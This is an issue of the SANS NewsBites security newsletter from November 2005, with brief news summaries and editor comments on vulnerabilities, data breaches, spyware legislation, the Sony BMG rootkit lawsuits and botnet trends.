SANS NewsBites is a semiweekly high-level executive summary of the most important news articles that have been published on computer security during the last week. Each news item is very briefly summarized and includes a reference on the web for detailed information, if possible.
Spend five minutes per week to keep up with the high-level perspective of all the latest security news. New issues are delivered free every Tuesday and Friday.
Volume VII - Issue #55
November 22, 2005
TOP OF THE NEWSSANS Top 20 Internet Security Vulnerability Shows Attackers Are Using New Approaches For Which Users Are Not Prepared
Senate Panels Approve Data Security Breach and Spyware Bills
Sony BMG Faces More Legal Challenges Over Rootkit DRM Software
Survey: IT Execs Say Security Will Top IT Spending List in 2006
THE REST OF THE WEEK'S NEWSARRESTS, CONVICTIONS AND SENTENCES
Spammer Sentenced to One Year in Prison
WORMS, ACTIVE EXPLOITS, VULNERABILITIES & PATCHES
Proof-of-Concept Code Available for Unpatched IE Flaw
Google Fixes Flaws in Gmail and Google Base
Macromedia Issues Patches for Trio of Flaws
ATTACKS & INTRUSIONS & DATA THEFT
Indiana University Business School Informs Students of Data Security Breach
Boeing Employee Data on Stolen Laptop
STATISTICS, STUDIES & SURVEYS
Irish IT Security Awareness Campaign Survey Finds Few Informed About Spyware and Phishing
Botnets Get Lean to Avoid Detection
************************** Security Training Update: ********************
"SANS has the answers to real-life problems and can fill in the education gaps that on the job training causes." Carol Templeton, Univ. of Tennessee
SANS 2006 brochures have started arriving in mail boxes. More immersion training tracks than ever before. Plus many new short courses for people who already have mastered their areas of security. A big security tools exposition. And Orlando in February is great.
SANS training at home or at your place of employment or in other cities:
"With SANS training, leading industry professionals share the latest knowledge and practices that work for them - you can not get this information anywhere else!" Douglas K Shamlin, US Navy
"I can not believe how much I learned in 6 days!" Kenny Johnson, US Air Force
TOP OF THE NEWS
SANS Top 20 Internet Security Vulnerability Shows Attackers Are Using New Approaches For Which Users Are Not Prepared (22 November 2005)The SANS Institute and the United Kingdom National Infrastructure Security Coordination Centre today announced the 2005 Top 20 Internet Security Vulnerabilities. The new report shows attackers are increasingly attacking security software and back up software and network security and communication devices that users (a) thought was keeping them safe, and (b) do not patch. The new threat sets defenders back six years in their fight against attackers.
Senate Panels Approve Data Security Breach and Spyware Bills (21/18 November 2005)Senate panels have approved two privacy-related bills. The Senate Judiciary Committee has approved the Personal Data Privacy and Security Act, which would require organizations that keep personal data for more than 10,000 people to implement privacy and security programs. It also allows people to examine their information and correct errors. Companies that experience security breaches must inform those whose data were compromised if the company determines there is a significant risk of identity or data fraud; if the company determines there is no risk, it must submit its findings to the US Secret Service, which may then conduct its own investigation. If the bill becomes law, it would preempt state data privacy laws. The Senate Commerce Committee approved the SPY BLOCK Act, which would require that users be informed when programs pose a privacy threat and provide users with an easy way to uninstall spyware. It also makes it a crime to install software on computers without authorization. The SPY BLOCK Act now heads to the Senate floor.
[Editor's Note (Schneier): It's long past time that the U.S. had the same sort of data privacy protection that is standard in the EU. However, one of the biggest abusers of data privacy these days seems to be the U.S. government. And they keep exempting new databases from what little privacy laws we new have. Will they be subject to the laws being contemplated?
(Honan): The Personal Data Privacy and Security Act is a step in the right direction but ideally should apply to all organizations that keep personal data and not just those that keep personal data for more than 10,000 people.
(Grefer): Federal legislation should set a _minimum_ standard, rather than pre-empting or annulling more stringent state legislation. Otherwise the work of a few well placed lobbyist all too often works to the detriment of the taxpaying consumers. ]
Sony BMG Faces More Legal Challenges Over Rootkit DRM Software (21 November 2005)Texas Attorney General Greg Abbott has filed a civil lawsuit against Sony BMG alleging that the software deposited on computers by the XCP DRM software makes the computers vulnerable to attackers. Texas' spyware law allows the state to collect as much as US$100,000 for each violation. The Electronic Frontier Foundation is also filing a lawsuit against Sony BMG; the suit is being filed under a California law that prohibits the collection of personally identifiable data and allows consumers to sue for damages. Finally, it appears that First4Internet, the company that developed the XCP DRM software violated copyright law by using a chunk of code written by someone else "without observing the terms under which it is distributed."
[Editor's Note (Schultz): The many problems that have resulted from Sony's release of its DRM software are bound to make any entity that considers developing and releasing similar software think again. Any organization bent on avoiding piracy is clearly going to have to take another approach.
(Shpantzer): You know you're having a bad PR day when your product appears in the Consumer Protection section of the AG of a major state:
Survey: IT Execs Say Security Will Top IT Spending List in 2006 (21 November 2005)A survey by Goldman Sachs & Co. of 100 IT executives found that security software and enterprise IT upgrades are expected to top their IT spending lists in 2006. Fifty two percent of those surveyed said they expected IT spending levels to be unchanged, while forty percent said they were considering reducing their IT budgets for 2006.
[Editor's Note (Pescatore) The article continues an area of much confusion: compliant does *not* mean secure, and spending on compliance does *not* always mean increasing security. There has been no shortage of user account information being stolen from companies who had no problem passing their Sarbanes Oxley audits. Spending to get secure and then prove compliance is one thing. Justifying spending because of "compliance" is very different - and there is a lot of this going on.
(Ranum): This may be skewed by the fact that a great deal of spending on lawyers and compliance auditing is being reported as a "security spending." ]
***************************** Sponsored Link: *************************
1) Earn your Master's degree in Information Security from an NSA - recognized online program.
THE REST OF THE WEEK'S NEWS
ARRESTS, CONVICTIONS AND SENTENCES
Spammer Sentenced to One Year in Prison (17 November 2005)Peter Moshou, sometimes known as the "Timeshare Spammer", was sentenced to one year in federal prison and ordered to pay US$120,000 in restitution for sending millions of spam messages in 2004 and 2005. Mr. Moshou was convicted in June of violating the CAN-SPAM Act; he had been named in a lawsuit filed by EarthLink. EarthLink also said that it has won a US$15.4 million judgment against Craig Brockwell and BC Alliance Inc. in a suit that claimed Mr. Brockwell and his company sent hundreds of thousands of unsolicited email messages.
WORMS, ACTIVE EXPLOITS, VULNERABILITIES & PATCHES
Google Fixes Flaws in Gmail and Google Base (21/18 November 2005)Google has fixed a flaw in its Gmail service that could have allowed attackers to take control of users' accounts; exploit details have been released. Google maintains that the vulnerability could be exploited only if the attacker has possession of a user's authentication token, a string that appears in the address bar after the user logs in and that is protected by encryption. In a separate story, Google has fixed a cross-site scripting vulnerability in its new content hosting service, Google Base, that could have allowed attackers to steal cookies and other sensitive information from other users. The problem also allowed attackers to embed phony forms within Google base web pages. A beta version of Google Base was released on November 16, 2005.
Macromedia Issues Patches for Trio of Flaws (17/16 November 2005)Macromedia has released patches for three flaws in a handful of its products. The flaws make the products vulnerable to crashes and information disclosure. Affected products include Macromedia Flash Communication Server MX versions 1.0 and 1.5, Macromedia Breeze Communication Server and Live Server and Macromedia Contribute Publishing Server.
ATTACKS & INTRUSIONS & DATA THEFT
Indiana University Business School Informs Students of Data Security Breach (18/17 November 2005)Technicians at Indiana University discovered three malware programs on a Kelley School of Business instructor's computer during a routine scan earlier this month. The programs were believed to have been installed in August 2005 and last accessed in October 2005. The laptop computer contains personal information belonging to 5,278 students who took a certain Introduction to Business course between 2001 and 2005; all have been sent a letter informing them of the security breach. The dean of the business school said all computers at the school are being audited to ensure proper configuration to allow automatic anti-virus and system software updates. A web site has been set up to address student concerns.
Boeing Employee Data on Stolen Laptop (19/18 November 2005)Boeing has acknowledged that a recently stolen laptop computer contained sensitive data belonging to more than 160,000 current and former employees. The laptop was stolen from an off-site location. Among the data on the computer are Social Security numbers, banking information and birth dates. Boeing is notifying everyone whose data were on the computer and will pay for enrollment in credit monitoring and fraud protection programs. Authorities have been notified as well.
[Editor's Note (Pescatore): Of course, the important question is: why was that data on a laptop? Having seen a number of HR applications, the most likely reason is that the standard HR application wouldn't give the user the reporting they wanted, so they downloaded the entire file to a PC to do spreadsheet reporting. This is a common reason why structured data shows up in so many unstructured places.
(Hayler): With so many products available to protect mobile data, it is amazing that stories like these are so common. A simple encryption package would have kept the employees' data safe and therefore saved the company money. ]
STATISTICS, STUDIES & SURVEYS
Irish IT Security Awareness Campaign Survey Finds Few Informed About Spyware and Phishing (17 November 2005)A survey conducted on behalf of Ireland's Make IT Secure Initiative found that 24 percent of those polled know what spyware is and just 13 percent feel they have a good understanding of what phishing is. However, 79 percent of home users and 75 percent of work users use anti-virus software. The public awareness campaign focuses on educating users about phishing, spyware, identity fraud and online child safety.
[Editor's Note (Ranum): A year ago, IT managers' attitude toward spyware was "What, me worry?" Now, spyware is going to (unfortunately) introduce the Windows computing world to the notion of trusted software distribution, transitive trust, and why a trusted computing base really is necessary. ]
Botnets Get Lean to Avoid Detection (16 November 2005)The average size of a botnet, a network of zombie PCs, has dropped from over 100,000 to 20,000 during the past two years. The change may be due to the fact that botnet operators have figured out that a smaller network makes them harder to detect and stop. Other explanations for the decrease in botnet size are the increasingly competitive environment for compromised PCs and the increased levels of security home users with broadband connections are taking to protect their computers from would-be infiltrators. Botnets are used to send spam and phishing email as well as to launch distributed denial-of-service (DDoS) attacks.
[Editor's Note (Grefer): Home user with broadband connections should install a router, such as the Linksys BEFSR41, between their DSL/cable modem and their computer/network, and to have a personal firewall software running on each computer. Antivirus software and anti-spyware products (such as Spybot Search & Destroy, round out the baseline setup. ]
NewsBites Editorial Board:
Kathy Bradford, Rohit Dhamankar, Roland Grefer, Richard Hayler, Jaap-Henk Hoepman, Brian Honan, Stephen Northcutt, Alan Paller, John Pescatore, Marcus Ranum, Howard Schmidt, Bruce Schneier, Eugene Schultz, Gal Shpantzer, Koon Yaw Tan
Please feel free to share this with interested parties via email, but no posting is allowed on web sites. For a free subscription, (and for free posters) or to update a current subscription, visit